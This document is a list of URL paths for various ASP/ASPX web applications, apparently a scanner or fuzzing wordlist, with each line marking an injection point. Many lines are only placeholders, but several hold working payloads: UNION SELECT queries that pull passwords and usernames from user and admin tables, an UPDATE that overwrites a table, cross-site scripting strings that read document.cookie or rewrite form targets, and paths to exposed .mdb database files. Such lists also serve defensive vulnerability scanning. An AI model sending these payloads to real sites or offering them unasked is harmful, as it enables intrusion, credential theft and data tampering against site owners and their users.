/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&
/dUpro/Businesses/../Pictures/detail.asp?iData=53&iCat=510&iChannel=3&nChannel='SQL_INJECTION
/dUpro/Businesses/../Pictures/detail.asp?iData=53&iCat=510&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Businesses/../Pictures/detail.asp?iData=53&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Businesses/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=510&iChannel=3&nChannel=Pictures
/dUpro/Businesses/detail.asp?iData=1&iCat=563&iChannel=18&nChannel='SQL_INJECTION
/dUpro/Businesses/detail.asp?iData=1&iCat=563&iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Businesses/detail.asp?iData='SQL_INJECTION&iCat=563&iChannel=18&nChannel=Businesses
/dUpro/Classifieds/../Pictures/detail.asp?iData=3&iCat=520&iChannel=3&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Pictures/detail.asp?iData=3&iCat=520&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Classifieds/../Pictures/detail.asp?iData=3&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Classifieds/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=520&iChannel=3&nChannel=Pictures
/dUpro/Classifieds/detail.asp?iData=14&iCat=351&iChannel=7&nChannel='SQL_INJECTION
/dUpro/Classifieds/detail.asp?iData=14&iCat=351&iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Classifieds/detail.asp?iData='SQL_INJECTION&iCat=351&iChannel=7&nChannel=Classifieds
/dUpro/Events/../events/detail.asp?iData=5&iCat=327&iChannel=6&nChannel='SQL_INJECTION
/dUpro/events/../events/detail.asp?iData=5&iCat=327&iChannel=6&nChannel='SQL_INJECTION
/dUpro/Events/../events/detail.asp?iData=5&iCat=327&iChannel='SQL_INJECTION&nChannel=Events
/dUpro/events/../events/detail.asp?iData=5&iCat=327&iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Events/../events/detail.asp?iData='SQL_INJECTION&iCat=327&iChannel=6&nChannel=Events
/dUpro/events/../events/detail.asp?iData='SQL_INJECTION&iCat=327&iChannel=6&nChannel=Events
/dUpro/events/../Pictures/detail.asp?iData=49&iCat=505&iChannel=3&nChannel='SQL_INJECTION
/dUpro/events/../Pictures/detail.asp?iData=49&iCat=505&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/events/../Pictures/detail.asp?iData=49&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Events/../Pictures/detail.asp?iData=5&iCat=520&iChannel=3&nChannel='SQL_INJECTION
/dUpro/Events/../Pictures/detail.asp?iData=5&iCat=520&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Events/../Pictures/detail.asp?iData=5&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/events/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=505&iChannel=3&nChannel=Pictures
/dUpro/Events/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=520&iChannel=3&nChannel=Pictures
/dUpro/Files/../Pictures/detail.asp?iData=8&iCat=206&iChannel=3&nChannel='SQL_INJECTION
/dUpro/Files/../Pictures/detail.asp?iData=8&iCat=206&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Files/../Pictures/detail.asp?iData=8&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Files/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=206&iChannel=3&nChannel=Pictures
/dUpro/Files/detail.asp?iData=4&iCat=433&iChannel=4&nChannel='SQL_INJECTION
/dUpro/Files/detail.asp?iData=4&iCat=433&iChannel='SQL_INJECTION&nChannel=Files
/dUpro/Files/detail.asp?iData='SQL_INJECTION&iCat=433&iChannel=4&nChannel=Files
/dUpro/home/../Articles/detail.asp?iData=26&iCat=238&iChannel=2&nChannel='SQL_INJECTION
/dUpro/home/../Articles/detail.asp?iData=26&iCat=238&iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/home/../Articles/detail.asp?iData='SQL_INJECTION&iCat=238&iChannel=2&nChannel=Articles
/dUpro/home/../Businesses/detail.asp?iData=16&iCat=548&iChannel=18&nChannel='SQL_INJECTION
/dUpro/home/../Businesses/detail.asp?iData=16&iCat=548&iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/home/../Businesses/detail.asp?iData='SQL_INJECTION&iCat=548&iChannel=18&nChannel=Businesses
/dUpro/home/../Classifieds/detail.asp?iData=15&iCat=222&iChannel=7&nChannel='SQL_INJECTION
/dUpro/home/../Classifieds/detail.asp?iData=15&iCat=222&iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/home/../Classifieds/detail.asp?iData='SQL_INJECTION&iCat=222&iChannel=7&nChannel=Classifieds
/dUpro/home/../Entertainments/detail.asp?iData=4&iCat=605&iChannel=19&nChannel='SQL_INJECTION
/dUpro/home/../Entertainments/detail.asp?iData=4&iCat=605&iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/home/../Entertainments/detail.asp?iData='SQL_INJECTION&iCat=605&iChannel=19&nChannel=Entertainments
/dUpro/home/../Events/detail.asp?iData=24&iCat=247&iChannel=6&nChannel='SQL_INJECTION
/dUpro/home/../Events/detail.asp?iData=24&iCat=247&iChannel='SQL_INJECTION&nChannel=Events
/dUpro/home/../Events/detail.asp?iData=5&iCat=327&iChannel=6&nChannel='SQL_INJECTION
/dUpro/home/../Events/detail.asp?iData=5&iCat=327&iChannel='SQL_INJECTION&nChannel=Events
/dUpro/home/../Events/detail.asp?iData='SQL_INJECTION&iCat=247&iChannel=6&nChannel=Events
/dUpro/home/../Events/detail.asp?iData='SQL_INJECTION&iCat=327&iChannel=6&nChannel=Events
/dUpro/home/../Files/detail.asp?iData=5&iCat=434&iChannel=4&nChannel='SQL_INJECTION
/dUpro/home/../Files/detail.asp?iData=5&iCat=434&iChannel='SQL_INJECTION&nChannel=Files
/dUpro/home/../Files/detail.asp?iData='SQL_INJECTION&iCat=434&iChannel=4&nChannel=Files
/dUpro/home/../Links/detail.asp?iData=6&iCat=390&iChannel=5&nChannel='SQL_INJECTION
/dUpro/home/../Links/detail.asp?iData=6&iCat=390&iChannel='SQL_INJECTION&nChannel=Links
/dUpro/home/../Links/detail.asp?iData='SQL_INJECTION&iCat=390&iChannel=5&nChannel=Links
/dUpro/home/../News/detail.asp?iData=21&iCat=250&iChannel=1&nChannel='SQL_INJECTION
/dUpro/home/../news/detail.asp?iData=21&iCat=250&iChannel=1&nChannel='SQL_INJECTION
/dUpro/home/../News/detail.asp?iData=21&iCat=250&iChannel='SQL_INJECTION&nChannel=News
/dUpro/home/../news/detail.asp?iData=21&iCat=250&iChannel='SQL_INJECTION&nChannel=News
/dUpro/home/../News/detail.asp?iData='SQL_INJECTION&iCat=250&iChannel=1&nChannel=News
/dUpro/home/../news/detail.asp?iData='SQL_INJECTION&iCat=250&iChannel=1&nChannel=News
/dUpro/home/../Pictures/detail.asp?iData=51&iCat=209&iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=51&iCat=209&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=51&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=53&iCat=510&iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=53&iCat=510&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=53&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=54&iCat=514&iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=54&iCat=514&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=54&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=55&iCat=206&iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=55&iCat=206&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=55&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=56&iCat=206&iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=56&iCat=206&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=56&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=6&iCat=206&iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=6&iCat=206&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=6&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=7&iCat=206&iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=7&iCat=206&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=7&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=206&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=209&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=510&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=514&iChannel=3&nChannel=Pictures
/dUpro/home/../Products/detail.asp?iData=9&iCat=231&iChannel=8&nChannel='SQL_INJECTION
/dUpro/home/../Products/detail.asp?iData=9&iCat=231&iChannel='SQL_INJECTION&nChannel=Products
/dUpro/home/../Products/detail.asp?iData='SQL_INJECTION&iCat=231&iChannel=8&nChannel=Products
/dUpro/home/../Topics/detail.asp?iData=29&iCat=478&iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/home/../Topics/detail.asp?iData=29&iCat='SQL_INJECTION&iChannel=16&nChannel=Topics
/dUpro/home/../Topics/detail.asp?iData='SQL_INJECTION&iCat=478&iChannel=16&nChannel=Topics
/dUpro/Pictures/../Pictures/detail.asp?iData=5&iCat=520&iChannel=3&nChannel='SQL_INJECTION
/dUpro/Pictures/../Pictures/detail.asp?iData=5&iCat=520&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Pictures/../Pictures/detail.asp?iData=5&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Pictures/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=520&iChannel=3&nChannel=Pictures
/dUpro/Pictures/detail.asp?iData=10&iCat=499&iChannel=3&nChannel='SQL_INJECTION
/dUpro/Pictures/detail.asp?iData=10&iCat=499&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Pictures/detail.asp?iData=10&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Pictures/detail.asp?iData='SQL_INJECTION&iCat=499&iChannel=3&nChannel=Pictures
/dUpro/polls/../polls/../Pictures/detail.asp?iData=30&iCat=208&iChannel=3&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Pictures/detail.asp?iData=30&iCat=208&iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/polls/../polls/../Pictures/detail.asp?iData=30&iCat='SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/polls/../polls/../Pictures/detail.asp?iData='SQL_INJECTION&iCat=208&iChannel=3&nChannel=Pictures
/dUpro/Topics/../topics/detail.asp?iData=28&iCat=479&iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Topics/../topics/detail.asp?iData=28&iCat='SQL_INJECTION&iChannel=16&nChannel=Topics
/dUpro/Topics/../topics/detail.asp?iData='SQL_INJECTION&iCat=479&iChannel=16&nChannel=Topics
/dUpro/Topics/../topics/detail.asp?iData='SQL_INJECTION&iCat=479&iChannel=16&nChannel=Topics
/dUpro/Businesses/detail.asp?iData=1&iCat='SQL_ERRORS&iChannel=18&nChannel=Businesses
/dUpro/Classifieds/detail.asp?iData=14&iCat='SQL_ERRORS&iChannel=7&nChannel=Classifieds
/dUpro/Events/../events/detail.asp?iData=5&iCat='SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/events/../events/detail.asp?iData=5&iCat='SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/Files/detail.asp?iData=4&iCat='SQL_ERRORS&iChannel=4&nChannel=Files
/dUpro/home/../Articles/detail.asp?iData=26&iCat='SQL_ERRORS&iChannel=2&nChannel=Articles
/dUpro/home/../Businesses/detail.asp?iData=16&iCat='SQL_ERRORS&iChannel=18&nChannel=Businesses
/dUpro/home/../Classifieds/detail.asp?iData=15&iCat='SQL_ERRORS&iChannel=7&nChannel=Classifieds
/dUpro/home/../Entertainments/detail.asp?iData=4&iCat='SQL_ERRORS&iChannel=19&nChannel=Entertainments
/dUpro/home/../Events/detail.asp?iData=24&iCat='SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/home/../Events/detail.asp?iData=5&iCat='SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/home/../Files/detail.asp?iData=5&iCat='SQL_ERRORS&iChannel=4&nChannel=Files
/dUpro/home/../Links/detail.asp?iData=6&iCat='SQL_ERRORS&iChannel=5&nChannel=Links
/dUpro/home/../News/detail.asp?iData=21&iCat='SQL_ERRORS&iChannel=1&nChannel=News
/dUpro/home/../news/detail.asp?iData=21&iCat='SQL_ERRORS&iChannel=1&nChannel=News
/dUpro/home/../Products/detail.asp?iData=9&iCat='SQL_ERRORS&iChannel=8&nChannel=Products
/dUpro/home/../Topics/detail.asp?iData=29&iCat=478&iChannel=16&nChannel='SQL_ERRORS
/dUpro/Topics/../topics/detail.asp?iData=28&iCat=479&iChannel=16&nChannel='SQL_ERRORS
/forum/forum.asp?pageid=1&H_ID=9 [ SQL INJEC]
/path/?mod=search&type=simple&q=[XSS]
/[product]/check_user.asp">
/[product]/check_user.asp">
/search.asp?Search="><script>alert()</script>
/index.asp?alpha=[SQL INJECTION]
/cezanneweb/home.asp?CFTARGET=";}alert("S21sec")</SCRIPT>%20-->
/aspmforum/kullanicilistesi.asp?harf=[sql injection]
/haber.asp?id=[SqL]
/haber.asp?id=-1%20union%20select%20*%20from%20haberler%20where%20id=82
/admin_group_details.asp?mode=%3C/textarea%3E'%22%3E%3Cscript%3Ealert('document.cookie')%3C/script%3E
/shoppingdirectory/midicart.mdb
/searchkey.asp?Keyword='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/path/admin/view.asp?SearchFor=[SQL]
/news/news.mdb
/news.mdb
/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3e&o=Relevance
//script_path/philboard_forum.asp?forumid=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users
/PATH/catalogue.asp?keyword=[sql]
/PATH/catalogue.asp?cid='[sql]
/PATH//viewDetail.asp?pid='[sql]
/DUclassified/adDetail.asp?cat_id=1;[SQL INJECT]&sub_id=1;[SQL INJECT]
/site/message.asp?message=[script]alert(document.cookie);[/script]
/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter=save&Page=rep
/CallManagerAddress/ccmadmin/phonelist.asp?findBy=description&match=begins&pattern=<script>alert(document.cookie)</script>&submit1=Find&rows=20&wildcards=on&utilityList=
/db/[DB-FILE-NAME]
/search_listing.asp?category='[sql]
/search_listing.asp?agent='[sql]
/pmprojects.asp?projectid=[XSS]
/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
/search.asp?searchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/login.asp?c=/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/register.asp">
/activate.asp?p=USERNAME
/category.asp?catcode=[SqlInjection]
/category.asp?catcode=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname='[Username]'
/admin/hosting/error.asp?error=<script>alert(do cument.cookie)</script>
/search.asp?categoryName=1&SH1=[xss]
/web/usermgr/userlist.asp
/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice='[sql]
/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice=0&amaxprice='[sql]
/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice=0&amaxprice=10000000&abedrooms='[sql]
/[path]/default.asp
/errors/rights.asp?awReadAccessRight=True&msg=<script>alert('XSS')</script>
/ow.asp?p=[XSS]
/press/details.asp?Press_Release_ID=[SQL]
/comersus6/store/comersus_optAffiliateRegistrationExec.asp?name=1&email='&Submit=Join%20now%21
/comersus6/store/comersus_optReviewReadExec.asp?idProduct='&description=
/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] http
/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
/test_DUportal/home/../home/channel.asp?iChannel='SQL_INJECTION&nChannel=Articles
/login.asp?sent=[sql]
/[Forum target]/login.asp
/[path]/index.asp?mid=[SQL Injection]
/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo=[SQL]&validate=1
/search.asp?in=y&keyword='[sql]
/search.asp?in=y&keyword=1&submit=Search&order='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect=1&type=1&city=1&minprice=1&maxprice=1&state='[sql]
/[path]/listings.asp?itemID=[SQL]
/forums/failure.asp?err_txt=<script>alert(document.cookie);</script>
/[patch]/blog.asp?=>"'><ScRiPt>alert(1369)</ScRiPt>
/services/details.asp?Service_ID=[SQL]
/[path to script]/editor_haber/hata.asp?hata=[XSS]
/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt>
/store/login.asp?message='"><script>alert(document.cookie)</script>&redirect=
/philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users
/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin
/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4
/shopadmin.asp name=LoginForm method=POST>
/dircat.asp?cid=[sql]
/pop_mail.asp?RC=[sql]
/loisweb/index.asp?topic=./links/results&resultstype=1&qs=396&qt=+qaq++[5]+%3D+%27%27+ANY_SQL_HERE
/MHCwa/DefaultAn.aspx?LayoutID=<script>alert('XSS')</script>
/mndir/enter.asp?gguvenlik=1&guvenlik=1&kuladi=victim&password=pass
/mndir/Your_Account.asp?op=RegTheme&theme=default',seviye='1
/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME='SQL_INJECTION
/mcart2pal/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME='SQL_INJECTION
/forum/search.asp?KW=|SQL|
/MyIssuesView.asp?Issue_ID=-1%20having%201=1--
/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--
/mcart2pfp/productsByCategory.asp?strSubCatalogID='SQL_INJECTION&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME=Laptops
/mcart2pal/productsByCategory.asp?strSubCatalogID=%27SQL_INJECTION&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME=Laptops
/mcart2sqluk/productsByCategory.asp?strSubCatalogID='SQL_INJECTION
/sa3.5.2.14/scripts/openPolicy.asp?policy='[sql]
/eventsignup.asp?ID=4197 UNION ALL SELECT username, etc FROM users--
/detail.asp?property_id='[sql]
/imagegallery/subList.asp?CatID='
/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&password=&ret_page=
/login.asp?user_name=&password=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ret_page=
/login.asp?email=sd%40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search_btn=SEND&action=lookup&do_search=1
/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln]
/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION
/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+chat&type="><script>alert("PWND")</script>
/?>"'><ScRiPt>alert(1369)</ScRiPt>
/poll/default.asp?catid=1+union+select+0,password+from+users
/categories.asp?document_id=37&cat_id=convert(int,(select+@@version));--
/owListProduct.asp?bSpecials='SQL_INJECTION
/owListProduct.asp?idCategory='SQL_INJECTION
/login.asp?ret_page=[XSS]
/Data/settings.xml
/pilot.asp?srch=[sql]
/PATH/location.asp?name="><script>alert('JosS')</script> http
/dora/default.asp?goster=iletisim
//dora/default.asp?goster=emlakdetay&id= [SQL]
/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http
/backOfficePlus/comersus_backoffice_searchItemForm.asp?forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE]
/lab/site/yonetim_kullanici_duzenle.asp?id=1+union+select+0,1,KULLANICIADI,3+from+KULLANICI
/lab/site/yonetim_kullanici_duzenle.asp?id=1+union+select+0,1,PAROLA,3+from+KULLANICI
/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+0,1,PAROLA,3+from+KULLANICI
/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+0,1,KULLANICIADI,3+from+KULLANICI
/lab/site/yonetim_kategori_duzenle.asp?ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI
/lab/site/yonetim_kategori_duzenle.asp?islem=duzenle&ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI
/lab/site/yonetim_site_onayla.asp?ID=1+union+select+0,1,KULLANICIADI,3,4,PAROLA,6,7,8,9,1,1+from+KULLANICI
/dUpro/Businesses/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/Businesses/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/Businesses/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/Businesses/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Businesses/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/Businesses/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Businesses/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/Businesses/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/Businesses/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/Businesses/../events/default.asp?iChannel=6&nChannel='SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Businesses/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Businesses/../events/default.asp?iChannel='SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Businesses/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/Businesses/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/Businesses/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/Businesses/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/Businesses/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/Businesses/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Businesses/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/Businesses/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Businesses/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/Businesses/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/Businesses/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Classifieds/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/Classifieds/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Classifieds/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Classifieds/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/Classifieds/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/Classifieds/../events/default.asp?iChannel=6&nChannel='SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Classifieds/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Classifieds/../events/default.asp?iChannel='SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Classifieds/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/Classifieds/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/Classifieds/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/Classifieds/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/Classifieds/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
